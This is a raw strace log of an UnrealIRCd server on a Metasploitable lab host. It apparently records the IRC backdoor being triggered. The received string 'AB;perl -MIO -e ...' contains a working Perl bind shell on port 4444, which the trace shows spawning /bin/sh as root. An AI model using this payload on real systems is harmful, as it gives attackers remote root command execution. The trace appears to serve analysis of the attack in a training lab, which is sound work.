4519  07:18:55.259209 select(1024, [2 3 4 7 9], [], NULL, {0, 820000}) = 1 (in [2], left {0, 680000})

4519  07:18:55.401540 clock_gettime(CLOCK_MONOTONIC, {1545, 218580998}) = 0

4519  07:18:55.401610 accept(2, 0, NULL) = 5

4519  07:18:55.401698 getpeername(5, {sa_family=AF_INET, sin_port=htons(38907), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:18:55.401759 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:18:55.401773 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:18:55.401786 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:18:55.401799 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:18:55.401810 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:18:55.401822 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:18:55.401836 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:18:55.401853 clock_gettime(CLOCK_MONOTONIC, {1545, 218867314}) = 0

4519  07:18:55.401866 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:18:55.401878 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:18:55.401888 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:18:55.401898 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:18:55.401908 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:18:55.401924 send(6, "\207\236\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:18:55.401980 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:18:55.402036 gettimeofday({1495624735, 402041}, NULL) = 0

4519  07:18:55.402066 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 990000})

4519  07:18:55.406726 clock_gettime(CLOCK_MONOTONIC, {1545, 223759741}) = 0

4519  07:18:55.406760 recvfrom(6, "\207\236\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\350\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:18:55.406802 close(6)          = 0

4519  07:18:55.406833 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:18:55.406872 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:18:55.406945 time(NULL)        = 1495624735

4519  07:18:55.406958 time(NULL)        = 1495624735

4519  07:18:55.407001 gettimeofday({1495624735, 407005}, NULL) = 0

4519  07:18:55.407013 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:18:55.407042 clock_gettime(CLOCK_MONOTONIC, {1545, 224055657}) = 0

4519  07:18:55.407053 gettimeofday({1495624735, 407096}, NULL) = 0

4519  07:18:55.407104 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [7], left {0, 550000})

4519  07:18:55.856578 clock_gettime(CLOCK_MONOTONIC, {1545, 673625619}) = 0

4519  07:18:55.856628 recv(7, "PRIVMSG  #testit2 Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 55

4519  07:18:55.856680 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856700 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856714 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856729 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856742 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856756 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856769 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856783 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856796 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856809 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856822 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856845 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856859 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856872 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856885 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856898 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856928 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.856970 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.857016 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.857030 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.857044 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.857057 getrusage(RUSAGE_SELF, {ru_utime={0, 0}, ru_stime={0, 220000}, ...}) = 0

4519  07:18:55.857073 gettimeofday({1495624735, 857076}, NULL) = 0

4519  07:18:55.857085 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:18:55.857125 clock_gettime(CLOCK_MONOTONIC, {1545, 674138031}) = 0

4519  07:18:55.857137 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:18:55.857165 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:18:55.857184 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:18:55.857196 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:18:55.857211 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 7472

7472  07:18:55.857282 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

7472  07:18:55.857296 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

7472  07:18:55.857306 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7472  07:18:55.857319 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

7472  07:18:55.857456 brk(0)            = 0x80f9000

7472  07:18:55.857493 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.857510 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9d000

7472  07:18:55.857527 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.857544 open("/etc/ld.so.cache", O_RDONLY) = 1

7472  07:18:55.857557 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7472  07:18:55.857575 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f95000

7472  07:18:55.857586 close(1)          = 0

7472  07:18:55.857597 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.857612 open("/lib/libncurses.so.5", O_RDONLY) = 1

7472  07:18:55.857625 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

7472  07:18:55.857721 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

7472  07:18:55.857738 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f65000

7472  07:18:55.857750 mmap2(0xb7f92000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f92000

7472  07:18:55.857770 close(1)          = 0

7472  07:18:55.857782 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.857796 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7472  07:18:55.857810 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7472  07:18:55.857898 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7472  07:18:55.857949 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f61000

7472  07:18:55.857961 mmap2(0xb7f63000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f63000

7472  07:18:55.857991 close(1)          = 0

7472  07:18:55.858003 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.858016 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7472  07:18:55.858030 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7472  07:18:55.858117 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7472  07:18:55.858133 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f60000

7472  07:18:55.858147 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e11000

7472  07:18:55.858157 mmap2(0xb7f5a000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f5a000

7472  07:18:55.858176 mmap2(0xb7f5d000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f5d000

7472  07:18:55.858190 close(1)          = 0

7472  07:18:55.858212 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e10000

7472  07:18:55.858224 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e106b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7472  07:18:55.858277 mprotect(0xb7f5a000, 4096, PROT_READ) = 0

7472  07:18:55.858313 munmap(0xb7f95000, 29913) = 0

7472  07:18:55.858338 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7472  07:18:55.858352 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

7472  07:18:55.858371 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9db390) = -1 ENOTTY (Inappropriate ioctl for device)

7472  07:18:55.858399 brk(0)            = 0x80f9000

7472  07:18:55.858426 brk(0x80fa000)    = 0x80fa000

7472  07:18:55.858455 brk(0x80fb000)    = 0x80fb000

7472  07:18:55.858471 getuid32()        = 0

7472  07:18:55.858481 getgid32()        = 0

7472  07:18:55.858490 geteuid32()       = 0

7472  07:18:55.858498 getegid32()       = 0

7472  07:18:55.858512 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7472  07:18:55.858525 time(NULL)        = 1495624735

7472  07:18:55.858538 brk(0x80fc000)    = 0x80fc000

7472  07:18:55.858555 brk(0x80fd000)    = 0x80fd000

7472  07:18:55.858574 open("/proc/meminfo", O_RDONLY) = 1

7472  07:18:55.858596 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

7472  07:18:55.858614 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9c000

7472  07:18:55.858625 read(1, "MemTotal:      1035240 kB\nMemFree:        555156 kB\nBuffers:         64792 kB\nCached:         258604 kB\nSwapCached:          0 kB\nActive:         254068 kB\nInactive:       198288 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        554916 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4024 kB\nWriteback:           0 kB\nAnonPages:      128968 kB\nMapped:          52008 kB\nSlab:            16584 kB\nSReclaimable:     8388 kB\nSUnreclaim:       8196 kB\nPageTables:       1960 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

7472  07:18:55.858708 close(1)          = 0

7472  07:18:55.858719 munmap(0xb7f9c000, 4096) = 0

7472  07:18:55.858730 brk(0x80fe000)    = 0x80fe000

7472  07:18:55.858757 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7472  07:18:55.858770 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

7472  07:18:55.858781 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7472  07:18:55.858793 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7472  07:18:55.858805 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

7472  07:18:55.858816 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

7472  07:18:55.858829 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7472  07:18:55.858852 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7472  07:18:55.858866 uname({sys="Linux", node="metasploitable", ...}) = 0

7472  07:18:55.858947 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

7472  07:18:55.858965 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7472  07:18:55.858983 brk(0x8100000)    = 0x8100000

7472  07:18:55.858995 getcwd("/etc/unreal", 4096) = 12

7472  07:18:55.859008 getpid()          = 7472

7472  07:18:55.859025 getppid()         = 4519

7472  07:18:55.859040 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7472  07:18:55.859059 stat64("/sbin/sh", 0xbf9db368) = -1 ENOENT (No such file or directory)

7472  07:18:55.859071 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7472  07:18:55.859091 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

7472  07:18:55.859115 socket(PF_FILE, SOCK_STREAM, 0) = 1

7472  07:18:55.859127 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7472  07:18:55.859139 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7472  07:18:55.859160 close(1)          = 0

7472  07:18:55.859172 socket(PF_FILE, SOCK_STREAM, 0) = 1

7472  07:18:55.859182 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

7472  07:18:55.859192 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

7472  07:18:55.859209 close(1)          = 0

7472  07:18:55.859222 open("/etc/nsswitch.conf", O_RDONLY) = 1

7472  07:18:55.859237 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

7472  07:18:55.859253 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9c000

7472  07:18:55.859264 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

7472  07:18:55.859312 read(1, "", 4096) = 0

7472  07:18:55.859321 close(1)          = 0

7472  07:18:55.859331 munmap(0xb7f9c000, 4096) = 0

7472  07:18:55.859359 open("/etc/ld.so.cache", O_RDONLY) = 1

7472  07:18:55.859415 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7472  07:18:55.859445 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f95000

7472  07:18:55.859455 close(1)          = 0

7472  07:18:55.859465 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.859480 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

7472  07:18:55.859495 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7472  07:18:55.859582 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7472  07:18:55.859599 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e07000

7472  07:18:55.859611 mmap2(0xb7e0e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e0e000

7472  07:18:55.859627 close(1)          = 0

7472  07:18:55.859639 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7472  07:18:55.859652 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7472  07:18:55.859666 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7472  07:18:55.859754 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7472  07:18:55.859771 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7def000

7472  07:18:55.859782 mmap2(0xb7e03000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e03000

7472  07:18:55.859797 mmap2(0xb7e05000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e05000

7472  07:18:55.859811 close(1)          = 0

7472  07:18:55.859846 munmap(0xb7f95000, 29913) = 0

7472  07:18:55.859886 open("/etc/ld.so.cache", O_RDONLY) = 1

